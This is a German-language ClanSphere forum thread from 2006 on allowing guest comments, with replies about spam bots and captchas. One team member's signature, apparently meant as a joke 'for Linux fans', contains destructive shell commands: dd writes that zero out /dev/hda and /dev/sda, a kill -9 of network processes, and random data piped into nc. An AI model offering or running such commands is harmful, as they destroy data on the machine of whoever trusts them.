Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 9
Seite [1]
Freeza


Beginner




Beiträge: 2
# Thema - 09.10.2006 um 20:08 Uhr
hallo,
ich habe mich entschlossen auf meiner homepage, den login teil und die profile wegzulassen. Leider musste ich feststellen, dass man nun keine Comments mehr schreiben kann. Selbstverständlich habe ich unter Zugriff schon alles ausprobiert, doch leider hat nix geklappt und das comment schreiben als unregistered users blieb versagt!

Kann mir jemand helfen, bzw den news mod umschreiben, sodass dies möglich ist? Oder kann amn das vlt doch leichter einstellen nur ich war zu blöd dazu?^^

Bitte helft mir^^ Freeza
Inaktiv
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 1 - 10.10.2006 um 04:43 Uhr
Wie auch schon im ICQ erwähnt ist das Ausschalten bzw entfernen diese Option sehr 'schwachsinnig'.

Ich bin zudem der Meinung dass man diese 'Option' garnicht entfernen bzw. Ausschalten kann.


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
macb


Beginner




Beiträge: 6
# Antwort: 2 - 10.10.2006 um 12:24 Uhr
Soweit ich es probiert habe ist es nur möglich wenn man den code nochmal komplett überarbeitet.
Schade eigentlich da ich mich mehr auf den Inhalt meiner Seite als den Code konzentrieren wollte. So werde ich, sobald ich den Funktionsumfang so habe wie ich will, den code umschreiben und somit von updates aussen vor sein.
Eine Systemeinstellung "Gästekommentare an/aus" wäre schon mehr als praktisch für manche Projekte.


Inaktiv
|
Fr33z3m4n ClanSphere Team


Medal of Honor




Herkunft: Hamm
Beiträge: 11094
# Antwort: 3 - 10.10.2006 um 12:26 Uhr
nicht sinnvoll.

Oder wollt Ihr wieder vollgespammt werden, von "Bots". Wenn ja, entfernt die Abfragen

Wenn Ihr das nicht wollte, muss sich jeder User halt registrieren.

Also mir wäre es lieber, es registrieren sich die User, als ein vollgespamtes Forum von Bots zu haben.


------------------
mfg
Patrick "Fr33z3m4n" Jaskulski

Antoine de Saint-Exupéry: Wenn Du ein Schiff bauen willst, so trommle nicht Männer zusammen, um Holz zu beschaffen, Aufgaben zu verteilen, sondern lehre die Männer die Sehnsucht nach dem endlosen weiten Meer.

Inaktiv
|
Freeza
Thread-Ersteller


Beginner




Beiträge: 2
# Antwort: 4 - 10.10.2006 um 16:32 Uhr
also ob es sinnvoll ist oder nicht sollte ja der homepage inhaber entscheiden

Kann das denn jemand machen? weil mit php abfragen kenn ich mciht nicht aus...wäre echt nett!


Inaktiv
|
SCHIRI ClanSphere Team


Weltmeister



Herkunft: Hamburg
Beiträge: 5299
# Antwort: 5 - 10.10.2006 um 17:02 Uhr
wenn s nieman sinnvoll findet, wird es wohl auch niemand machen, denn man codet meistens nur sachen, die man auch für sich selbst gebrauchen kann


------------------
www.laszlokorte.de

Inaktiv
|
Denni


Specialist




Herkunft: Ilsfeld
Beiträge: 1972
# Antwort: 6 - 10.10.2006 um 17:04 Uhr
wenn s nieman sinnvoll findet, wird es wohl auch niemand machen, denn man codet meistens nur sachen, die man auch für sich selbst gebrauchen kann


das nicht unbedingt, aber etwas das ich sinnlos finde würde ich nicht machen, egal ob ichs brauchen kann oder nicht


------------------
Gruß
Denni

ClanSphere - Makes your website a playmate, just dress her

Inaktiv
|
macb


Beginner




Beiträge: 6
# Antwort: 7 - 12.10.2006 um 10:09 Uhr
Wie sicher wäre denn der einsatz von so nem Sicherheitscode wie bei der Registrierung? So dass unregistrierte Nutzer eben für jeden Kommentar so einen code eingeben müssten.

Und, ja. Hätte ich auch nur ein bisschen mehr Zeit würde ich mich selber dran machen die Sicherheitsabfragen rauszunehmen und eine "neue Kommentare"-Leiste ins Home einbauen. Aber leider verlangen (Doppel)Studium, Vereine, Familie einfach zu viel Zeit.


Inaktiv
|
Fr33z3m4n ClanSphere Team


Medal of Honor




Herkunft: Hamm
Beiträge: 11094
# Antwort: 8 - 12.10.2006 um 12:31 Uhr
Schau dir z.b. Das Gästebuch Modul an, dort ist "Captacha" für nicht registrierte eingebunden.

Mit ein wenig Frimeln bekommt man das auch in andere Module eingebaut.


------------------
mfg
Patrick "Fr33z3m4n" Jaskulski

Antoine de Saint-Exupéry: Wenn Du ein Schiff bauen willst, so trommle nicht Männer zusammen, um Holz zu beschaffen, Aufgaben zu verteilen, sondern lehre die Männer die Sehnsucht nach dem endlosen weiten Meer.

Inaktiv
|
LiLiaN


Beginner




Herkunft: SouthBörlin
Beiträge: 15
# Antwort: 9 - 19.10.2006 um 09:17 Uhr
Wäre auch daran interessiert, wenn aber mit nem Sicherheitscode, der eben Boteinträge vermeidet. Macht das vllt jmd?

Grad auf ner Clanhp ist eine Kommentarfunktion für Nichtregistrierte sehr komfortabel. Bei vielen Seiten ist es leider genauso wie bei bxcp: Kommentare werden für Gäste verwehrt. Dadurch leidet aber auch die Kommunikation, weil man bei zig Clans irgendwann einfach keinen Bock mehr hat sich immer erst registrieren zu müssen um mal n Kommentar schreiben zu können (auch wenn dieser vllt wichtig ist).


Inaktiv
|
Antworten: 9
Seite [1]


Sie müssen sich registrieren, um zu antworten.